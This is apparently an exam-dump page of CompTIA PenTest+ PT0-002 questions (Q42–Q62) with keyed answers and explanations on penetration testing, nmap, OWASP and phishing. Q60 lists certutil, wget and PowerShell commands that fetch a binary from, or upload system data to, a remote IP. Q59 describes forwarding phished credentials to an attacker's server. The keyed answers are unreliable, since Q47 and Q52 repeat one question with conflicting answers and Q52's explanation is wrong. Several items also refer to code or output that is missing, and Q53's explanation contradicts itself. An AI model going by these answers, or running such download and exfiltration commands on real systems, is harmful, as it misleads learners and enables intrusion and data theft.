PT0-002 Dumps 2024 New CompTIA PT0-002 Exam Questions [Q42-Q62]


NEW QUESTION # 42
Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?

  • A. NIST SP 800-53
  • B. ISO 27001
  • C. GDPR

Answer: C

Explanation:
GDPR is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten. GDPR stands for General Data Protection Regulation, and it is a law that applies to the European Union and the United Kingdom. GDPR gives individuals the right to request their personal data be deleted by data controllers and processors under certain circumstances, such as when the data is no longer necessary, when the consent is withdrawn, or when the data was unlawfully processed. GDPR also imposes other obligations and rights related to data protection, such as data minimization, data portability, data breach notification, and consent management. The other options are not regulatory compliance standards that focus on user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security and privacy controls for federal information systems and organizations in the United States. ISO 27001 is an international standard that specifies the requirements for an information security management system.


NEW QUESTION # 43
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

  • A. The tester reached the end of the assessment time frame.
  • B. The tester completed the assigned part of the assessment workflow.
  • C. The tester found evidence of prior compromise within the data set.
  • D. The tester had the situational awareness to stop the transfer.

Answer: D

Explanation:
Situational awareness is the ability to perceive and understand the environment and events around oneself, and to act accordingly. The penetration tester demonstrated situational awareness by stopping the transfer of PII, which was out of scope and could have violated the ROE or legal and ethical principles. The other options are not relevant to the situation or the decision of the penetration tester.


NEW QUESTION # 44
The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?

  • A. Line 02
  • B. Line 07
  • C. Line 08
  • D. Line 01

Answer: C


NEW QUESTION # 45
A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?

  • A. GDB
  • B. SearchSploit
  • C. Netcat
  • D. Burp Suite

Answer: A


NEW QUESTION # 46
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.
Which of the following changes should the tester apply to make the script work as intended?

  • A. Change line 2 to $ip= 10.192.168.253;
  • B. Move all the lines below line 7 to the top of the script.
  • C. Remove lines 3, 5, and 6.
  • D. Remove line 6.

Answer: C

Explanation:
https://www.asc.ohio-state.edu/lewis.239/Class/Perl/perl.html
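Example script:
#!/usr/bin/perl
# Read the target IP from the first command-line argument (Perl's @ARGV is uppercase and zero-indexed).
$ip = $ARGV[0];
attack($ip);
# Placeholder subroutine: prints a marker to show it was called.
sub attack {
    print("x");
}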


NEW QUESTION # 47
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

  • A. Encode64
  • B. Metadata removal
  • C. Encryption
  • D. Steganography

Answer: D


NEW QUESTION # 48
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Buffer overflows
  • B. Race-condition attacks
  • C. Cross-site scripting
  • D. Injection flaws
  • E. Ransomware attacks
  • F. Zero-day attacks

Answer: C,D

Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
Cross-site scripting (XSS) and injection flaws are two of the web-application security risks that are part of the OWASP Top 10 v2017 list. XSS is a type of attack that injects malicious scripts into web pages or applications that are viewed by other users, resulting in compromised sessions, stolen cookies, or redirected browsers. Injection flaws are a type of attack that exploits a vulnerability in an application's data input or output, such as SQL injection, command injection, or LDAP injection, resulting in unauthorized access, data loss, or remote code execution. The other options are not part of the OWASP Top 10 v2017 list.


NEW QUESTION # 49
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

  • A. Known environment testing
  • B. Unknown environment testing
  • C. Partially known environment testing
  • D. Physical environment testing

Answer: B


NEW QUESTION # 50
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

  • A. A red-team assessment
  • B. A compliance-based assessment
  • C. A known-environment assessment
  • D. An unknown-environment assessment

Answer: A

Explanation:
A red-team assessment is a type of penetration testing that simulates a real-world attack scenario with the goal of accessing specific data or systems. A red-team assessment is different from an unknown-environment assessment, which does not have a predefined objective and focuses on discovering as much information as possible about the target. A known-environment assessment is a type of penetration testing that involves cooperation and communication with the target organization, and may not focus on specific data or systems. A compliance-based assessment is a type of penetration testing that aims to meet certain regulatory or industry standards, and may not focus on specific data or systems.


NEW QUESTION # 51
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

  • A. Eliminating the potential for false positives
  • B. Reducing the risk to the client environment
  • C. Reprioritizing the goals/objectives
  • D. Maximizing the likelihood of finding vulnerabilities

Answer: C

Explanation:
Goal reprioritization: Have the goals of the assessment changed? Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of the critical network, but it is a side effect of goal reprioritization.


NEW QUESTION # 52
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

  • A. Encode64
  • B. Steganography
  • C. Metadata removal
  • D. Encryption

Answer: C

Explanation:
All other answers are a form of encryption or randomizing the data.


NEW QUESTION # 53
The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

  • A. Line 19
  • B. Line 8
  • C. Line 20
  • D. Line 13

Answer: B

Explanation:
$X=2,4,6,8,9,20,5
$y=[System.Collections.ArrayList]$X
$y.RemoveRange(1,2)
As you can see, the array has no brackets and no periods. It has semicolons to separate the listed items or values.


NEW QUESTION # 54
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

  • A. nmap -sS -sL -p80 192.168.1.20
  • B. nmap -O -v -p80 192.168.1.20
  • C. nmap -A -T4 -p80 192.168.1.20
  • D. nmap -f -sV -p80 192.168.1.20

Answer: C

Explanation:
This command will scan the host 192.168.1.20 on port 80 using the following options:
* -A: This option enables OS detection, version detection, script scanning, and traceroute. This will help to determine if the host is running an approved version of Linux and a patched version of Apache, as well as other information about the host and the network path.
* -T4: This option sets the timing template to aggressive, which speeds up the scan by increasing the number of parallel probes, reducing the timeouts, and assuming faster responses.
* -p80: This option specifies the port to scan, which is 80 in this case. Port 80 is commonly used for HTTP services, such as Apache web server.


NEW QUESTION # 55
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement multifactor authentication on all corporate applications.
  • B. Implement an email security gateway to block spam and malware from email communications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement a recurring cybersecurity awareness education program for all users.

Answer: D

Explanation:
The simulated phishing attack showed that most of the employees were not able to recognize or avoid a common social engineering technique that could compromise their corporate credentials and expose sensitive data or systems. The best way to address this situation is to implement a recurring cybersecurity awareness education program for all users that covers topics such as phishing, password security, data protection, and incident reporting. This will help raise the level of security awareness and reduce the risk of falling victim to phishing attacks in the future. The other options are not as effective or feasible as educating users about phishing prevention techniques.


NEW QUESTION # 56
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

  • A. Application failures
  • B. Bandwidth limitations
  • C. Patch installations
  • D. Successful exploits

Answer: D

Explanation:
Successful exploits could cause network disruptions, service outages, or data corruption, which could affect the connectivity and functionality of the oil rig network. Patch installations, application failures, and bandwidth limitations are less likely to be related to the penetration testing activities.


NEW QUESTION # 57
A penetration tester runs the following command:
nmap -p- -A 10.0.1.10
Given the execution of this command, which of the following quantities of ports will Nmap scan?

  • A. 65,535
  • B. 10,000
  • C. 1,000
  • D. 1,024

Answer: A

Explanation:
The nmap command with the -p- flag scans all ports from 1 to 65535 on the target host. The -A flag enables OS detection, version detection, script scanning, and traceroute. Therefore, the command will scan 65,535 ports on the host 10.0.1.10 and perform additional analysis on the open ports.
References:
* The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 2: Conducting Passive Reconnaissance, page 72-73.
* Nmap Cheat Sheet 2024: All the Commands & Flags - StationX
* Nmap Commands - 17 Basic Commands for Linux Network - phoenixNAP


NEW QUESTION # 58
In Python socket programming, SOCK_DGRAM type is:

  • A. matrixed.
  • B. reliable.
  • C. connectionless.
  • D. slower.

Answer: C

Explanation:
Connectionless: the "DGRAM" in SOCK_DGRAM refers to datagrams, which means the socket is using UDP.


NEW QUESTION # 59
For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

  • A. window.location.= 'https://evilcorp.com'
  • B. crossDomain: true
  • C. redirectUrl = 'https://example.com'
  • D. geturlparameter ('username')

Answer: B


NEW QUESTION # 60
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  • C. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Answer: C

Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
The certutil command is a Windows utility that can be used to manipulate certificates and certificate authorities.
However, it can also be abused by attackers to download files from remote servers using the -urlcache option.
In this case, the command downloads accesschk64.exe from http://192.168.2.124/windows-binaries/ and saves it locally. Accesschk64.exe is a tool that can be used to check service permissions and identify potential privilege escalation vectors. The other commands are not relevant for this purpose. Powershell is a scripting language that can be used to perform various tasks, but in this case it uploads a file instead of downloading one. Schtasks is a command that can be used to create or query scheduled tasks, but it does not help with service permissions. Wget is a Linux command that can be used to download files from the web, but it does not work on Windows by default.


NEW QUESTION # 61
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

  • A. Credential stuffing
  • B. Port scan
  • C. Brute force
  • D. DoS attack

Answer: C

Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.




CompTIA PT0-002, the CompTIA PenTest+ Certification exam, is a valuable credential for cybersecurity professionals who want to expand their skill set and demonstrate their expertise in penetration testing and ethical hacking. The PT0-002 exam covers a wide range of topics and requires candidates to have both theoretical knowledge and practical experience. The CompTIA PenTest+ certification is globally recognized and can help professionals advance their careers in the cybersecurity industry.


The CompTIA PT0-002 exam comprises 85 multiple-choice and performance-based questions, and it takes 165 minutes to complete. Candidates who want to take the exam are advised to have a minimum of two years of experience in information security and knowledge of multiple operating systems, networking protocols, and programming languages.

 
